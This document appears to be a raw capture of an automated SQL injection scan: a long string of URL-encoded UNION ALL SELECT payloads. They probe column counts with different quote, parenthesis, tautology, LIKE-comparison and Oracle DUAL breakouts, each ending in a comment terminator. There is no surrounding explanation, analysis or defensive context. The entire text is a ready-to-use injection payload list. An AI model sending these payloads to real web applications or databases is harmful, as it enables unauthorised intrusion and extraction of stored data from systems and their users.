-9005%22%29%29%29%20UNION%20ALL%20SELECT%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%2C%206854%23%20AND%20%28%28%28%22etje%22%3D%22etje -1951%22%29%29%29%20UNION%20ALL%20SELECT%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%23%20AND%20%28%28%28%22bxUO%22%3D%22bxUO -5922%22%29%29%29%20UNION%20ALL%20SELECT%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%2C%209436%23%20AND%20%28%28%28%22mtnx%22%3D%22mtnx -3050%22%29%29%29%20UNION%20ALL%20SELECT%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%2C%205319%23%20AND%20%28%28%28%22Xuwl%22%3D%22Xuwl -7023%22%29%29%29%20UNION%20ALL%20SELECT%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%23%20AND%20%28%28%28%22WPjJ%22%3D%22WPjJ -2126%22%29%29%29%20UNION%20ALL%20SELECT%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%2C%204885%23%20AND%20%28%28%28%22oDge%22%3D%22oDge -3560%22%29%29%29%20UNION%20ALL%20SELECT%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%2C%204024%23%20AND%20%28%28%28%22Ecrd%22%3D%22Ecrd -6281%22%29%29%29%20UNION%20ALL%20SELECT%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%2C%201248%23%20AND%20%28%28%28%22FcNt%22%3D%22FcNt -3563%22%29%29%29%20UNION%20ALL%20SELECT%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%23%20AND%20%28%28%28%22niGI%22%3D%22niGI -1757%22%20UNION%20ALL%20SELECT%205953%2C%205953%2C%205953%2C%205953%2C%205953%2C%205953%2C%205953%2C%205953%2C%205953%2C%205953%2C%205953%23%20AND%20%22Jddo%22%3D%22Jddo -7377%22%20UNION%20ALL%20SELECT%209499%2C%209499%2C%209499%2C%209499%2C%209499%2C%209499%2C%209499%2C%209499%2C%209499%2C%209499%2C%209499%2C%209499%23%20AND%20%22XHOx%22%3D%22XHOx -8880%22%20UNION%20ALL%20SELECT%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%23%20AND%20%22wmQp%22%3D%22wmQp -1907%22%20UNION%20ALL%20SELECT%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%2C%202481%23%20AND%20%22TVnu%22%3D%22TVnu -9305%22%20UNION%20ALL%20SELECT%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%2C%203234%23%20AND%20%22UXhj%22%3D%22UXhj -7773%22%20UNION%20ALL%20SELECT%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%2C%204270%23%20AND%20%22hOLD%22%3D%22hOLD -7888%22%20UNION%20ALL%20SELECT%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%2C%207352%23%20AND%20%22WyxW%22%3D%22WyxW -6566%22%20UNION%20ALL%20SELECT%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%2C%208389%23%20AND%20%22viBI%22%3D%22viBI -9857%22%20UNION%20ALL%20SELECT%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%2C%209163%23%20AND%20%22sCdJ%22%3D%22sCdJ -2224%22%20UNION%20ALL%20SELECT%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%2C%202670%23%20AND%20%22iBhy%22%3D%22iBhy -9132%22%29%20UNION%20ALL%20SELECT%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%2C%202099%23%20AND%20%28%22PywT%22%20LIKE%20%22PywT -1113%22%29%20UNION%20ALL%20SELECT%205498%2C%205498%2C%205498%2C%205498%2C%205498%2C%205498%2C%205498%2C%205498%2C%205498%2C%205498%2C%205498%2C%205498%23%20AND%20%28%22ciiG%22%20LIKE%20%22ciiG -2240%22%29%20UNION%20ALL%20SELECT%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%2C%203104%23%20AND%20%28%22juPc%22%20LIKE%20%22juPc -3717%22%29%20UNION%20ALL%20SELECT%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%2C%206093%23%20AND%20%28%22QKua%22%20LIKE%20%22QKua -7854%22%29%20UNION%20ALL%20SELECT%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%2C%208977%23%20AND%20%28%22KjxQ%22%20LIKE%20%22KjxQ -5277%22%29%20UNION%20ALL%20SELECT%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%23%20AND%20%28%22kqCp%22%20LIKE%20%22kqCp -7465%22%29%20UNION%20ALL%20SELECT%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%2C%203735%23%20AND%20%28%22zNzr%22%20LIKE%20%22zNzr -8993%22%29%20UNION%20ALL%20SELECT%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%23%20AND%20%28%22TdBH%22%20LIKE%20%22TdBH -7761%22%29%20UNION%20ALL%20SELECT%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%2C%204478%23%20AND%20%28%22dPiK%22%20LIKE%20%22dPiK -7998%22%29%20UNION%20ALL%20SELECT%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%2C%203021%23%20AND%20%28%22DtEU%22%20LIKE%20%22DtEU -2821%22%29%29%20UNION%20ALL%20SELECT%209322%2C%209322%2C%209322%2C%209322%2C%209322%2C%209322%2C%209322%2C%209322%2C%209322%2C%209322%2C%209322%23%20AND%20%28%28%22ZqzI%22%20LIKE%20%22ZqzI -7232%22%29%29%20UNION%20ALL%20SELECT%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%2C%203678%23%20AND%20%28%28%22tKpk%22%20LIKE%20%22tKpk -6661%22%29%29%20UNION%20ALL%20SELECT%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%2C%208667%23%20AND%20%28%28%22FkyG%22%20LIKE%20%22FkyG -3335%22%29%29%20UNION%20ALL%20SELECT%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%2C%201096%23%20AND%20%28%28%22nWBu%22%20LIKE%20%22nWBu -8467%22%29%29%20UNION%20ALL%20SELECT%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%2C%205861%23%20AND%20%28%28%22WqCo%22%20LIKE%20%22WqCo -1122%22%29%29%20UNION%20ALL%20SELECT%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%2C%206600%23%20AND%20%28%28%22FzXD%22%20LIKE%20%22FzXD -1974%22%29%29%20UNION%20ALL%20SELECT%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%2C%207663%23%20AND%20%28%28%22Ifwx%22%20LIKE%20%22Ifwx -8202%22%29%29%20UNION%20ALL%20SELECT%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%2C%209759%23%20AND%20%28%28%22pghR%22%20LIKE%20%22pghR -3961%22%29%29%20UNION%20ALL%20SELECT%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%23%20AND%20%28%28%22Osep%22%20LIKE%20%22Osep -2347%22%29%29%20UNION%20ALL%20SELECT%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%2C%204364%23%20AND%20%28%28%22oFSK%22%20LIKE%20%22oFSK -2220%22%29%29%29%20UNION%20ALL%20SELECT%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%2C%202386%23%20AND%20%28%28%28%22SzUo%22%20LIKE%20%22SzUo -6723%22%29%29%29%20UNION%20ALL%20SELECT%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%2C%204160%23%20AND%20%28%28%28%22DtWL%22%20LIKE%20%22DtWL -6572%22%29%29%29%20UNION%20ALL%20SELECT%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%2C%205122%23%20AND%20%28%28%28%22qwNl%22%20LIKE%20%22qwNl -3913%22%29%29%29%20UNION%20ALL%20SELECT%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%2C%205095%23%20AND%20%28%28%28%22obLn%22%20LIKE%20%22obLn -4289%22%29%29%29%20UNION%20ALL%20SELECT%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%23%20AND%20%28%28%28%22lGuh%22%20LIKE%20%22lGuh -4999%22%29%29%29%20UNION%20ALL%20SELECT%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%2C%209338%23%20AND%20%28%28%28%22ccju%22%20LIKE%20%22ccju -3148%22%29%29%29%20UNION%20ALL%20SELECT%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%2C%205970%23%20AND%20%28%28%28%22SbFl%22%20LIKE%20%22SbFl -7821%22%29%29%29%20UNION%20ALL%20SELECT%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%23%20AND%20%28%28%28%22OASK%22%20LIKE%20%22OASK -7714%22%29%29%29%20UNION%20ALL%20SELECT%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%2C%205211%23%20AND%20%28%28%28%22GvIX%22%20LIKE%20%22GvIX -6766%22%29%29%29%20UNION%20ALL%20SELECT%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%2C%208290%23%20AND%20%28%28%28%22vMKT%22%20LIKE%20%22vMKT -1151%22%20UNION%20ALL%20SELECT%203777%2C%203777%2C%203777%2C%203777%2C%203777%2C%203777%2C%203777%2C%203777%2C%203777%2C%203777%2C%203777%23%20AND%20%22GJPI%22%20LIKE%20%22GJPI -4364%22%20UNION%20ALL%20SELECT%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%2C%203192%23%20AND%20%22Czul%22%20LIKE%20%22Czul -8052%22%20UNION%20ALL%20SELECT%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%2C%203775%23%20AND%20%22cHFw%22%20LIKE%20%22cHFw -3859%22%20UNION%20ALL%20SELECT%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%2C%202617%23%20AND%20%22PVkp%22%20LIKE%20%22PVkp -3999%22%20UNION%20ALL%20SELECT%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%2C%209627%23%20AND%20%22NyjC%22%20LIKE%20%22NyjC -3807%22%20UNION%20ALL%20SELECT%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%2C%209048%23%20AND%20%22pwBw%22%20LIKE%20%22pwBw -5817%22%20UNION%20ALL%20SELECT%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%2C%206034%23%20AND%20%22xHVl%22%20LIKE%20%22xHVl -4422%22%20UNION%20ALL%20SELECT%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%2C%205061%23%20AND%20%22BOyy%22%20LIKE%20%22BOyy -9780%22%20UNION%20ALL%20SELECT%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%2C%209520%23%20AND%20%22wgZk%22%20LIKE%20%22wgZk -7184%22%20UNION%20ALL%20SELECT%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%23%20AND%20%22IJYD%22%20LIKE%20%22IJYD -1475%29%20WHERE%205420%3D5420%20UNION%20ALL%20SELECT%205420%2C%205420%2C%205420%2C%205420%2C%205420%2C%205420%2C%205420%2C%205420%2C%205420%2C%205420%2C%205420%23 -3368%29%20WHERE%205532%3D5532%20UNION%20ALL%20SELECT%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%2C%205532%23 -8107%29%20WHERE%207385%3D7385%20UNION%20ALL%20SELECT%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%2C%207385%23 -3184%29%20WHERE%207645%3D7645%20UNION%20ALL%20SELECT%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%2C%207645%23 -2242%29%20WHERE%202547%3D2547%20UNION%20ALL%20SELECT%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%23 -7474%29%20WHERE%201818%3D1818%20UNION%20ALL%20SELECT%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%2C%201818%23 -6973%29%20WHERE%202700%3D2700%20UNION%20ALL%20SELECT%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%23 -7407%29%20WHERE%202037%3D2037%20UNION%20ALL%20SELECT%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%2C%202037%23 -3747%29%20WHERE%208131%3D8131%20UNION%20ALL%20SELECT%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%2C%208131%23 -2575%29%20WHERE%209391%3D9391%20UNION%20ALL%20SELECT%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%2C%209391%23 -3309%27%29%20WHERE%201732%3D1732%20UNION%20ALL%20SELECT%201732%2C%201732%2C%201732%2C%201732%2C%201732%2C%201732%2C%201732%2C%201732%2C%201732%2C%201732%2C%201732%23 -7662%27%29%20WHERE%206252%3D6252%20UNION%20ALL%20SELECT%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%23 -5806%27%29%20WHERE%206321%3D6321%20UNION%20ALL%20SELECT%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%2C%206321%23 -1864%27%29%20WHERE%208262%3D8262%20UNION%20ALL%20SELECT%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%2C%208262%23 -7615%27%29%20WHERE%202985%3D2985%20UNION%20ALL%20SELECT%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%2C%202985%23 -1318%27%29%20WHERE%206360%3D6360%20UNION%20ALL%20SELECT%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%2C%206360%23 -9659%27%29%20WHERE%203634%3D3634%20UNION%20ALL%20SELECT%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%2C%203634%23 -7210%27%29%20WHERE%209494%3D9494%20UNION%20ALL%20SELECT%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%2C%209494%23 -2424%27%29%20WHERE%206571%3D6571%20UNION%20ALL%20SELECT%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%2C%206571%23 -5509%27%29%20WHERE%209076%3D9076%20UNION%20ALL%20SELECT%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%2C%209076%23 -4856%27%20WHERE%207999%3D7999%20UNION%20ALL%20SELECT%207999%2C%207999%2C%207999%2C%207999%2C%207999%2C%207999%2C%207999%2C%207999%2C%207999%2C%207999%2C%207999%23 -6616%27%20WHERE%201439%3D1439%20UNION%20ALL%20SELECT%201439%2C%201439%2C%201439%2C%201439%2C%201439%2C%201439%2C%201439%2C%201439%2C%201439%2C%201439%2C%201439%2C%201439%23 -4310%27%20WHERE%207631%3D7631%20UNION%20ALL%20SELECT%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%2C%207631%23 -6791%27%20WHERE%206963%3D6963%20UNION%20ALL%20SELECT%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%2C%206963%23 -5322%27%20WHERE%206160%3D6160%20UNION%20ALL%20SELECT%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%2C%206160%23 -2559%27%20WHERE%203060%3D3060%20UNION%20ALL%20SELECT%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%2C%203060%23 -7919%27%20WHERE%206244%3D6244%20UNION%20ALL%20SELECT%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%23 -2041%27%20WHERE%205219%3D5219%20UNION%20ALL%20SELECT%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%2C%205219%23 -6428%27%20WHERE%205148%3D5148%20UNION%20ALL%20SELECT%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%2C%205148%23 -3422%27%20WHERE%206031%3D6031%20UNION%20ALL%20SELECT%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%2C%206031%23 -2477%22%20WHERE%203074%3D3074%20UNION%20ALL%20SELECT%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%2C%203074%23 -3870%22%20WHERE%201995%3D1995%20UNION%20ALL%20SELECT%201995%2C%201995%2C%201995%2C%201995%2C%201995%2C%201995%2C%201995%2C%201995%2C%201995%2C%201995%2C%201995%2C%201995%23 -2521%22%20WHERE%205305%3D5305%20UNION%20ALL%20SELECT%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%2C%205305%23 -3121%22%20WHERE%209113%3D9113%20UNION%20ALL%20SELECT%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%2C%209113%23 -4613%22%20WHERE%202426%3D2426%20UNION%20ALL%20SELECT%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%2C%202426%23 -2014%22%20WHERE%209892%3D9892%20UNION%20ALL%20SELECT%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%2C%209892%23 -8151%22%20WHERE%203322%3D3322%20UNION%20ALL%20SELECT%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%2C%203322%23 -3831%22%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%2C%209800%23 -7391%22%20WHERE%209780%3D9780%20UNION%20ALL%20SELECT%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%2C%209780%23 -7818%22%20WHERE%207061%3D7061%20UNION%20ALL%20SELECT%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%2C%207061%23 -3723%27%20%7C%7C%20%28SELECT%203316%20FROM%20DUAL%20WHERE%205177%3D5177%20UNION%20ALL%20SELECT%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%23%20%29%20%7C%7C%20%27 -2804%27%20%7C%7C%20%28SELECT%202473%20FROM%20DUAL%20WHERE%206179%3D6179%20UNION%20ALL%20SELECT%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%2C%206179%23%20%29%20%7C%7C%20%27 -4074%27%20%7C%7C%20%28SELECT%203961%20FROM%20DUAL%20WHERE%208235%3D8235%20UNION%20ALL%20SELECT%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%2C%208235%23%20%29%20%7C%7C%20%27 -4134%27%20%7C%7C%20%28SELECT%201904%20FROM%20DUAL%20WHERE%208347%3D8347%20UNION%20ALL%20SELECT%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%2C%208347%23%20%29%20%7C%7C%20%27 -1059%27%20%7C%7C%20%28SELECT%204069%20FROM%20DUAL%20WHERE%202300%3D2300%20UNION%20ALL%20SELECT%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%2C%202300%23%20%29%20%7C%7C%20%27 -2598%27%20%7C%7C%20%28SELECT%203265%20FROM%20DUAL%20WHERE%202147%3D2147%20UNION%20ALL%20SELECT%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%2C%202147%23%20%29%20%7C%7C%20%27 -4838%27%20%7C%7C%20%28SELECT%204440%20FROM%20DUAL%20WHERE%201904%3D1904%20UNION%20ALL%20SELECT%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%2C%201904%23%20%29%20%7C%7C%20%27 